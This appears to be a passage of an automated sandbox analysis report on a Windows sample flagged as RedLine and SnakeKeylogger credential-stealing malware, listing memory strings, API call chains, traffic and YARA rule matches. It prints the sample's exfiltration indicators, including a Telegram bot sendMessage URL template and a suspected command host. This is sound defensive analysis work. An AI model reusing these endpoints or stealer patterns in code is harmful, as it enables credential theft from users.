Source: svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000002.00000002.4804087692.00000000053F5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000053F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 00000002.00000002.4804087692.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enX
Source: svchost.exe, 00000002.00000002.4804087692.00000000053F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enl
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.000000000533D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052CD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 00000002.00000002.4804087692.00000000052CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.000000000533D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: svchost.exe, 00000002.00000002.4804087692.0000000005417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/X
Source: svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 63812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:63815 version: TLS 1.2

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F14164

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F14164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F14164

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F13F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00F13F66

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F0001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00F0001C

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F2CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00F2CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.vnV17JImCH.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4802248742.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2361531765.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00EA3B3A
Source: vnV17JImCH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: vnV17JImCH.exe, 00000000.00000000.2343079651.0000000000F54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4cd31711-8
Source: vnV17JImCH.exe, 00000000.00000000.2343079651.0000000000F54000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_fc9ebe98-d
Source: vnV17JImCH.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a2b32392-7
Source: vnV17JImCH.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_13db3e03-2

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F0A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00F0A1EF

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00EF8310

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00F051BD

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECD975	0_2_00ECD975
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC21C5	0_2_00EC21C5
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED62D2	0_2_00ED62D2
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F203DA	0_2_00F203DA
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED242E	0_2_00ED242E
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC25FA	0_2_00EC25FA
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB66E1	0_2_00EB66E1
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EAE6A0	0_2_00EAE6A0
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EFE616	0_2_00EFE616
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED878F	0_2_00ED878F
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F08889	0_2_00F08889
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F20857	0_2_00F20857
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED6844	0_2_00ED6844
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB8808	0_2_00EB8808
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECCB21	0_2_00ECCB21
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED6DB6	0_2_00ED6DB6
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB6F9E	0_2_00EB6F9E
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB3030	0_2_00EB3030
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECF1D9	0_2_00ECF1D9
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC3187	0_2_00EC3187
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EA1287	0_2_00EA1287
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC1484	0_2_00EC1484
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB5520	0_2_00EB5520
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC7696	0_2_00EC7696
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB5760	0_2_00EB5760
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC1978	0_2_00EC1978
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ED9AB5	0_2_00ED9AB5
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EAFCE0	0_2_00EAFCE0
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F27DDB	0_2_00F27DDB
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECBDA6	0_2_00ECBDA6
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC1D90	0_2_00EC1D90
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EB3FE0	0_2_00EB3FE0
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EADF00	0_2_00EADF00
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_016F2000	0_2_016F2000
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_016F5730	0_2_016F5730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A7630	2_2_077A7630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AC6B7	2_2_077AC6B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A431B	2_2_077A431B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AD213	2_2_077AD213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AF168	2_2_077AF168
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077ACF3B	2_2_077ACF3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A2F8B	2_2_077A2F8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A6EA8	2_2_077A6EA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077ACC63	2_2_077ACC63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077ADADF	2_2_077ADADF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AC98B	2_2_077AC98B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AD80F	2_2_077AD80F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AF163	2_2_077AF163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AFA28	2_2_077AFA28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AFA18	2_2_077AFA18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A5887	2_2_077A5887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F82980	2_2_08F82980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F852A8	2_2_08F852A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F89EA8	2_2_08F89EA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F82298	2_2_08F82298
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F897D8	2_2_08F897D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F81BB0	2_2_08F81BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F80B30	2_2_08F80B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E4E8	2_2_08F8E4E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E4D9	2_2_08F8E4D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E090	2_2_08F8E090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8E07F	2_2_08F8E07F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F80040	2_2_08F80040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_08F8DC38	2_2_08F8DC38
